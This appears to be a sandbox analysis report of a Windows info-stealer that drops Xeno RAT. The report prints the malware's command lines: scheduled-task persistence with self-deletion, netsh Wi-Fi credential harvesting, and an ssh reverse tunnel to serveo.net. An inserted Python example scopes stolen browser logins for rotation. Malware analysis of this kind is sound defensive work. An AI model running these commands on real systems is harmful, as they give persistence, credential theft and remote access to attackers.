Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior (identical entry repeated 74 times in the report)

System Summary

Source: 0LpFv1haTA.exe, eK83r.cs Long String: Length: 10266
Source: 0LpFv1haTA.exe.0.dr, eK83r.cs Long String: Length: 10266
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process Stats: CPU usage > 49%
Source: C:\Users\user\Desktop\0LpFv1haTA.exe Code function: 0_2_00007FF848F0325A 0_2_00007FF848F0325A
Source: C:\Users\user\Desktop\0LpFv1haTA.exe Code function: 0_2_00007FF848F02E1C 0_2_00007FF848F02E1C
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Code function: 7_2_00007FF848F12E1C 7_2_00007FF848F12E1C
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Code function: 7_2_00007FF848F131C7 7_2_00007FF848F131C7
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Code function: 13_2_00007FF848F2928A 13_2_00007FF848F2928A
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Code function: 13_2_00007FF848F131C7 13_2_00007FF848F131C7
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Code function: 13_2_00007FF848F1B9ED 13_2_00007FF848F1B9ED
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Code function: 13_2_00007FF848F12E1C 13_2_00007FF848F12E1C
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Code function: 13_2_00007FF848F2A6E2 13_2_00007FF848F2A6E2
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Code function: 13_2_00007FF848F1DD70 13_2_00007FF848F1DD70
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Code function: 13_2_00007FF848F238AE 13_2_00007FF848F238AE
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Code function: 13_2_00007FF848F28B0D 13_2_00007FF848F28B0D
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Code function: 40_2_00007FF848F22E1C 40_2_00007FF848F22E1C
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Code function: 40_2_00007FF848F2325A 40_2_00007FF848F2325A
Source: C:\Users\user\AppData\Roaming\manager.exe Code function: 41_2_023B0B88 41_2_023B0B88
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe Code function: 42_2_03223768 42_2_03223768
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe Code function: 42_2_03224350 42_2_03224350
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe Code function: 42_2_03224B80 42_2_03224B80
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe Code function: 42_2_03220B88 42_2_03220B88
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe Code function: 42_2_03222138 42_2_03222138
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe Code function: 42_2_03220B78 42_2_03220B78
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe Code function: 42_2_03223759 42_2_03223759
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe Code function: 45_2_00ED0B88 45_2_00ED0B88
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Code function: 46_2_00007FF848F32E1C 46_2_00007FF848F32E1C
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Code function: 46_2_00007FF848F331C7 46_2_00007FF848F331C7
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Code function: 47_2_00007FF848F12E1C 47_2_00007FF848F12E1C
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Code function: 47_2_00007FF848F131C7 47_2_00007FF848F131C7
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Code function: 48_2_00007FF848F12E1C 48_2_00007FF848F12E1C
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Code function: 48_2_00007FF848F131C7 48_2_00007FF848F131C7
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 5500 -s 3644
Source: 0LpFv1haTA.exe, 00000000.00000000.2093729342.0000019457B52000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameI4021fb56e8cb7cb0489bdc10979dda.exep( vs 0LpFv1haTA.exe
Source: 0LpFv1haTA.exe Binary or memory string: OriginalFilenameI4021fb56e8cb7cb0489bdc10979dda.exep( vs 0LpFv1haTA.exe
Source: 0LpFv1haTA.exe.0.dr Binary or memory string: OriginalFilenameI4021fb56e8cb7cb0489bdc10979dda.exep( vs 0LpFv1haTA.exe
Source: manager.exe.7.dr, Encryption.cs Cryptographic APIs: 'CreateDecryptor'
Source: manager.exe.41.dr, Encryption.cs Cryptographic APIs: 'CreateDecryptor'
Source: manager.exe.7.dr, Handler.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0LpFv1haTA.exe.0.dr, ub.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0LpFv1haTA.exe.0.dr, ub.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: manager.exe.41.dr, Handler.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0LpFv1haTA.exe, ub.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0LpFv1haTA.exe, ub.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@68/17@3/11
Source: C:\Users\user\Desktop\0LpFv1haTA.exe File created: C:\Users\user\AppData\Local\Starlabs Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6196:120:WilError_03
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3996:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5384:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7240:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2860:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7124:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5620:120:WilError_03
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Mutant created: \Sessions\1\BaseNamedObjects\m1ddre3jjw
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1680:120:WilError_03
Source: C:\Users\user\AppData\Roaming\XenoManager\manager.exe Mutant created: \Sessions\1\BaseNamedObjects\Xeno_rat_nd8912d-admin
Source: C:\Windows\System32\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5500
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe File created: C:\Users\user\AppData\Local\Temp\K-Journals Jump to behavior
Source: 0LpFv1haTA.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 0LpFv1haTA.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.98%
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\0LpFv1haTA.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\0LpFv1haTA.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449DCA000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449DB8000.00000004.00000800.00020000.00000000.sdmp, 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E44A2B6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
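The `CREATE TABLE password_notes` string above is the DDL of a Chromium "Login Data" SQLite database, which tells a responder that the stealer reads saved browser logins. The following is an added example, not code from the report or from either malware family: given a copy of that database, it lists which hosts and usernames are stored so the affected credentials can be rotated. The `logins` table here is a reduced stand-in (assumed columns `id`, `origin_url`, `username_value`, `password_value`, `date_last_used`, a subset of the real schema), the `password_notes` DDL is the fragment from the report, and every row is constructed. The encrypted `password_value` blob is never read.

```python
"""
Added example (not the report's or the stealer's code): scope a copied
Chromium "Login Data" database for credential rotation. The logins table
is an assumed subset of the real schema; rows are made up.
"""
import sqlite3
from urllib.parse import urlsplit

SCHEMA = """
CREATE TABLE logins (
    id INTEGER PRIMARY KEY AUTOINCREMENT,
    origin_url VARCHAR NOT NULL,
    username_value VARCHAR,
    password_value BLOB,
    date_last_used INTEGER NOT NULL DEFAULT 0
);
CREATE TABLE password_notes (
    id INTEGER PRIMARY KEY AUTOINCREMENT,
    parent_id INTEGER NOT NULL REFERENCES logins
        ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED,
    key VARCHAR NOT NULL,
    value BLOB,
    date_created INTEGER NOT NULL,
    confidential INTEGER,
    UNIQUE (parent_id, key)
);
"""


def open_readonly(path):
    """Open a *copy* of Login Data read-only; never the live file the browser holds open."""
    return sqlite3.connect(f"file:{path}?mode=ro", uri=True)


def build_sample_db():
    """Constructed in-memory stand-in with made-up rows (no real credentials)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    conn.executemany(
        "INSERT INTO logins (origin_url, username_value, password_value, date_last_used) "
        "VALUES (?, ?, ?, ?)",
        [("https://mail.example.com/login", "alice", b"v10\x01\x02\x03", 20),
         ("https://bank.example.org/", "alice", b"v10\x04\x05\x06", 10),
         ("https://mail.example.com/login", "bob", b"v10\x07\x08\x09", 30)])
    # A note attached to login id 1: a stealer that dumps password_notes takes this as well.
    conn.execute(
        "INSERT INTO password_notes (parent_id, key, value, date_created, confidential) "
        "VALUES (1, 'note', ?, 1, 1)",
        (b"recovery code 1234",))
    conn.commit()
    return conn


def exposed_credentials(conn):
    """(host, username, note_count, date_last_used) per stored login, most recently used first.
    Only metadata columns are selected; the encrypted password_value blob stays untouched."""
    rows = conn.execute("""
        SELECT l.origin_url, l.username_value, COUNT(n.id), l.date_last_used
        FROM logins AS l LEFT JOIN password_notes AS n ON n.parent_id = l.id
        GROUP BY l.id
        ORDER BY l.date_last_used DESC, l.origin_url, l.username_value
    """).fetchall()
    return [(urlsplit(url).hostname or url, user, notes, used)
            for url, user, notes, used in rows]


def affected_hosts(conn):
    """Sorted unique hosts with at least one stored login, for the rotation ticket."""
    return sorted({host for host, *_ in exposed_credentials(conn)})


if __name__ == "__main__":
    db = build_sample_db()
    for host, user, notes, used in exposed_credentials(db):
        print(f"{host:20} {user:10} notes={notes} last_used={used}")
    print("hosts to rotate:", affected_hosts(db))
```

On a real host, copy `%LOCALAPPDATA%\Google\Chrome\User Data\Default\Login Data` (and any `Login Data-journal` or WAL sidecar) to the evidence store first and pass the copy to `open_readonly`; the date ordering puts the credentials the user touched most recently, and therefore most likely still valid, at the top of the rotation list.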
Source: 0LpFv1haTA.exe ReversingLabs: Detection: 81%
Source: C:\Users\user\Desktop\0LpFv1haTA.exe File read: C:\Users\user\Desktop\0LpFv1haTA.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\0LpFv1haTA.exe "C:\Users\user\Desktop\0LpFv1haTA.exe"
Source: C:\Users\user\Desktop\0LpFv1haTA.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && schtasks /create /tn "0LpFv1haTA" /sc MINUTE /tr "C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\user\Desktop\0LpFv1haTA.exe" &&START "" "C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\timeout.exe timeout /t 3
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe schtasks /create /tn "0LpFv1haTA" /sc MINUTE /tr "C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe" /rl HIGHEST /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe "C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe"
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /R /C:"[ ]:[ ]"
Source: unknown Process created: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show networks mode=bssid
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr "SSID BSSID Signal"
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /R /C:"[ ]:[ ]"
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process created: C:\Windows\System32\OpenSSH\ssh.exe "ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:7634 serveo.net
Source: C:\Windows\System32\OpenSSH\ssh.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
